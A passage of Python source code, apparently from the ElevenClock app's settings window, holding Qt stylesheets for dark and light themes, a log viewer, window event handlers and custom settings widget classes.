border-radius: {self.getPx(6)}px;
border: 1px solid #262626;
}}
#background,QMessageBox,QDialog,QSlider,#ControlWidget{{
color: white;
background-color: #212121;
}}
QScrollArea {{
color: white;
background-color: #212121;
}}
QLabel {{
font-family: "Segoe UI Variable Display Semib";
font-weight: medium;
}}
* {{
color: #dddddd;
font-size: 8pt;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #212121;
selection-background-color: rgb({colors[4]});
border: none;
}}
QSpinBox {{
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
QPushButton {{
width: 100px;
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
QPushButton:hover {{
background-color: #393939;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #414141;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #454545;
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[2]});
border-top-color: rgb({colors[1]});
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[1]});
border-top-color: rgb({colors[1]});
}}
#title{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: #303030;
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: #252525;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:disabled {{
background-color: #303030;
color: #bbbbbb;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #2a2a2a;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[1]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stChk::indicator:checked:disabled {{
border: {self.getPx(1)}px solid #444444;
background-color: #303030;
color: #bbbbbb;
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[2]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: 100px;
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
#stCmbbx:disabled {{
width: 100px;
background-color: #303030;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #393939;
}}
#stCmbbx:hover {{
background-color: #393939;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #414141;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #454545;
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx::down-arrow:disabled {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(2)}px;
width: {self.getPx(2)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid #1c1c1c;
padding: {self.getPx(4)}px;
outline: 0px;
padding-right: {self.getPx(0)}px;
background-color: #303030;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background-color: #4c4c4c;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QSCrollArea, QVBoxLayout{{
border: none;
margin: none;
padding: none;
outline: none;
}}
QScrollBar:vertical {{
background: #303030;
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #505050;
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #808080;
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
""")
else:
self.iconMode = "black"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.experimentalTitle.setIcon(getPath(f"experiment_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.PichonButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.QtButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.CofeeButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.startupButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.RegionButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.WebPageButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.logButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.closeButton.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.openTranslateButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.titlebar.closeButton.setIconSize(QSize(self.getPx(14), self.getPx(14)))
self.titlebar.closeButton.setIcon(QIcon(getPath(f"cross_{self.iconMode}.png")))
self.titlebar.closeButton.setFixedHeight(self.getPx(32))
self.titlebar.closeButton.setFixedWidth(self.getPx(46))
self.titlebar.maximizeButton.setFixedHeight(self.getPx(32))
self.titlebar.maximizeButton.setIconSize(QSize(self.getPx(14), self.getPx(14)))
self.titlebar.maximizeButton.setIcon(QIcon(getPath(f"maximize_{self.iconMode}.png")))
self.titlebar.maximizeButton.setFixedWidth(self.getPx(46))
self.titlebar.minimizeButton.setFixedHeight(self.getPx(32))
self.titlebar.minimizeButton.setIconSize(QSize(self.getPx(12), self.getPx(12)))
self.titlebar.minimizeButton.setIcon(QIcon(getPath(f"minimize_{self.iconMode}.png")))
self.titlebar.minimizeButton.setFixedWidth(self.getPx(46))
self.setStyleSheet(f"""
#backgroundWindow {{
background-color: rgba({colors[3]}, 1);
}}
#titlebarButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#titlebarButton:hover {{
border-radius: 0px;
background-color: rgba({colors[3]}, 1);
}}
#closeButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#closeButton:hover {{
border-radius: 0px;
background-color: rgba(196, 43, 28, 1);
}}
QToolTip{{
border: {self.getPx(1)}px solid #dddddd;
padding: {self.getPx(4)}px;
border-radius: {self.getPx(6)}px;
background-color: #eeeeee;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #ffffff;
selection-background-color: rgb({colors[3]});
border: none;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(200, 200, 200);
padding: {self.getPx(2)}px;
outline: 0px;
color: black;
background: #eeeeee;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(200, 200, 200);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(0, 0, 0, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QColorDialog {{
background-color: transparent;
border: none;
}}
#background,QScrollArea,QMessageBox,QDialog,QSlider,#ControlWidget{{
color: white;
}}
* {{
background-color: #eeeeee;
color: #000000;
font-size: 8pt;
}}
QPushButton {{
width: 100px;
background-color: #ffffff;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
QPushButton:hover {{
background-color: #f6f6f6;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[4]});
border-bottom-color: rgb({colors[5]});
color: white;
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[3]});
color: white;
border-bottom-color: rgb({colors[3]});
}}
#title{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 1px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: #ffffff;
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
border-bottom: 1px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: #ffffff;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:disabled {{
background-color: #eeeeee;
color: #bbbbbb;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #eeeeee;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(0)}px solid #bbbbbb;
background-color: rgb({colors[4]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(0)}px solid #bbbbbb;
background-color: rgb({colors[3]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:disabled {{
border: {self.getPx(1)}px solid #bbbbbb;
background-color: #eeeeee;
color: #bbbbbb;
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: 100px;
background-color: #ffffff;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#stCmbbx:disabled {{
width: 100px;
background-color: #eeeeee;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #dddddd;
}}
#stCmbbx:hover {{
background-color: #f6f6f6;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx::down-arrow:disabled {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(2)}px;
width: {self.getPx(2)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid #dddddd;
padding: {self.getPx(4)}px;
outline: 0px;
background-color: #ffffff;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background-color: #eeeeee;
height: {self.getPx(30)}px;
outline: none;
color: black;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QSCrollArea,QVBoxLayout{{
border: none;
margin: none;
padding: none;
outline: none;
}}
QScrollBar:vertical {{
background: #ffffff;
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #dddddd;
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #bbbbbb;
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
""")
def showDebugInfo(self):
global old_stdout, buffer
win = QMainWindow(self)
win.resize(800, 600)
win.setWindowTitle("ElevenClock's log")
textEdit = QPlainTextEdit()
textEdit.setReadOnly(True)
textEdit.setPlainText(globals.buffer.getvalue())
win.setCentralWidget(textEdit)
win.show()
def moveEvent(self, event: QMoveEvent) -> None:
if(self.updateSize):
pass
else:
def enableUpdateSize(self: SettingsWindow):
time.sleep(1)
self.updateSize = True
self.updateSize = False
KillableThread(target=enableUpdateSize, args=(self,)).start()
def mouseReleaseEvent(self, event) -> None:
if(self.updateSize):
self.settingsWidget.resize(self.width()-self.getPx(17), self.settingsWidget.height())
self.settingsWidget.setMinimumHeight(self.settingsWidget.sizeHint().height())
self.applyStyleSheet()
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.titlebar.setStyleSheet(f"#ControlWidget{{border-top-left-radius: {self.getPx(6)}px;border-top-right-radius: {self.getPx(6)}px;}}#closeButton{{border-top-right-radius: {self.getPx(6)}px;}}")
self.vlayout.setContentsMargins(2, 2, 2, 2)
self.updateSize = False
return super().mouseReleaseEvent(event)
def resizeEvent(self, event: QMoveEvent) -> None:
self.settingsWidget.resize(self.width()-self.getPx(17), self.settingsWidget.height())
self.settingsWidget.setMinimumHeight(self.settingsWidget.sizeHint().height())
def show(self) -> None:
self.applyStyleSheet()
self.raise_()
self.vlayout.setContentsMargins(2, 2, 2, 2)
return super().show()
def eventFilter(self, watched: QObject, event: QEvent) -> bool:
if event.type() == event.WindowStateChange:
if self.isMaximized():
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;}}")
self.titlebar.setStyleSheet(f"#ControlWidget{{border-top-left-radius: 0px;border-top-right-radius: 0px;}}#closeButton{{border-top-right-radius: 0px;}}")
self.vlayout.setContentsMargins(0, 0, 0, 0)
else:
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.titlebar.setStyleSheet(f"#ControlWidget{{border-top-left-radius: {self.getPx(6)}px;border-top-right-radius: {self.getPx(6)}px;}}#closeButton{{border-top-right-radius: {self.getPx(6)}px;}}")
self.vlayout.setContentsMargins(2, 2, 2, 2)
return super().eventFilter(watched, event)
def showEvent(self, event: QShowEvent) -> None:
self.resize(900, 600)
self.settingsWidget.setMinimumHeight(self.settingsWidget.sizeHint().height())
return super().showEvent(event)
def closeEvent(self, event: QCloseEvent) -> None:
self.hide()
event.ignore()
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
class QIconLabel(QWidget):
def __init__(self, text, icon=None):
super().__init__()
self.setObjectName("subtitleLabel")
self.label = QLabel(text, self)
if lang == lang_zh_TW or lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 13pt;background: none;font-family: \"Microsoft JhengHei UI\";")
else:
self.label.setStyleSheet("font-size: 13pt;background: none;font-family: \"Segoe UI Variable Display\";")
self.image = QLabel(self)
self.image.setPixmap(QIcon(icon).pixmap(QSize(24, 24)))
self.image.setStyleSheet("padding: 3px;background: none;")
self.setAttribute(Qt.WA_StyledBackground)
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def setIcon(self, icon: str) -> None:
self.image.setPixmap(QIcon(icon).pixmap(QSize(24, 24)))
def resizeEvent(self, event: QResizeEvent) -> None:
self.label.move(self.getPx(60), self.getPx(25))
self.label.setFixedHeight(self.getPx(30))
self.image.move(self.getPx(22), self.getPx(25))
self.image.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(70))
self.image.setFixedHeight(self.getPx(30))
self.label.setFixedWidth(self.width()-self.getPx(70))
self.image.setFixedWidth(self.getPx(30))
return super().resizeEvent(event)
class QSettingsButton(QWidget):
clicked = Signal()
def __init__(self, text="", btntext="", parent=None, h = 30):
super().__init__(parent)
self.fh = h
self.setAttribute(Qt.WA_StyledBackground)
self.button = QPushButton(btntext+" ", self)
self.button.setLayoutDirection(Qt.RightToLeft)
self.setObjectName("stBtn")
self.label = QLabel(text, self)
if lang == lang_zh_TW or lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.button.setStyleSheet("font-size: 10pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.label.setObjectName("StLbl")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.button.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
self.button.clicked.connect(self.clicked.emit)
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(170), self.getPx(10))
self.label.move(self.getPx(60), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(230))
self.label.setFixedHeight(self.getPx(self.fh))
self.setFixedHeight(self.getPx(50+(self.fh-30)))
self.button.setFixedHeight(self.getPx(self.fh))
self.button.setFixedWidth(self.getPx(150))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
self.button.setIcon(icon)
class QSettingsComboBox(QWidget):
textChanged = Signal(str)
def __init__(self, text="", btntext="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBox(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.setItemDelegate(QStyledItemDelegate(self.combobox))
self.setObjectName("stBtn")
self.restartButton = QPushButton("Restart ElevenClock", self)
self.restartButton.hide()
self.restartButton.setObjectName("AccentButton")
self.label = QLabel(text, self)
if lang == lang_zh_TW or lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def setItems(self, items: list, index: int) -> None:
self.combobox.addItems(items)
try:
self.combobox.setCurrentIndex(index)
except Exception as e:
report(e)
self.combobox.setCurrentIndex(0)
self.combobox.currentTextChanged.connect(self.textChanged.emit)
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.label.move(self.getPx(60), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(480))
self.label.setFixedHeight(self.getPx(30))
self.restartButton.move(self.width()-self.getPx(430), self.getPx(10))
self.restartButton.setFixedWidth(self.getPx(150))
self.restartButton.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
pass
#self.button.setIcon(icon)
def showRestartButton(self) -> None:
self.restartButton.show()
class QSettingsCheckBox(QWidget):
stateChanged = Signal(bool)
def __init__(self, text="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.setObjectName("stChkBg")
self.checkbox = QCheckBox(text, self)
if lang == lang_zh_TW or lang == lang_zh_CN:
self.checkbox.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
self.checkbox.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.checkbox.setObjectName("stChk")
self.checkbox.stateChanged.connect(self.stateChanged.emit)
def setChecked(self, checked: bool) -> None:
self.checkbox.setChecked(checked)
def isChecked(self) -> bool:
return self.checkbox.isChecked()
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedHeight(self.getPx(30))
self.checkbox.setFixedWidth(self.width()-self.getPx(70))
self.setFixedHeight(self.getPx(50))
return super().resizeEvent(event)
class QSettingsSizeBoxComboBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBox(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.currentIndexChanged.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, i: int):
self.valueChanged.emit(self.combobox.itemText(i))
def stateChangedEvent(self, v: bool):
self.combobox.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.combobox.setEnabled(False)
self.combobox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.combobox.setEnabled(True)
self.combobox.setToolTip("")
self.valueChanged.emit(self.combobox.currentText())
self.stateChanged.emit(v)
def loadItems(self):
self.combobox.clear()
self.combobox.addItems(str(item) for item in [5, 6, 7, 7.5, 8, 8.5, 9, 9.5, 10, 10.5, 11, 11.5, 12, 13, 14, 16])
class QCustomColorDialog(QColorDialog):
def __init__(self, parent = ...) -> None:
super().__init__(parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
class QSettingsSizeBoxColorDialog(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.colorDialog = QColorDialog(self)
self.colorDialog.setOptions(QColorDialog.DontUseNativeDialog)
self.button = QPushButton(self)
self.button.setObjectName("stCmbbx")
self.button.setText("Select custom color")
self.button.clicked.connect(self.colorDialog.show)
self.colorDialog.colorSelected.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.button.setFixedHeight(self.getPx(30))
self.button.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, c: QColor):
r = c.red()
g = c.green()
b = c.blue()
color = f"{r},{g},{b}"
self.valueChanged.emit(color)
self.button.setStyleSheet(f"color: rgb({color})")
def stateChangedEvent(self, v: bool):
self.button.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.button.setEnabled(False)
self.button.setStyleSheet("")
self.button.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.button.setEnabled(True)
self.button.setToolTip("")
self.stateChanged.emit(v)
class QSettingsFontBoxComboBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QFontComboBox(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.currentIndexChanged.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, i: int):
self.valueChanged.emit(self.combobox.itemText(i))
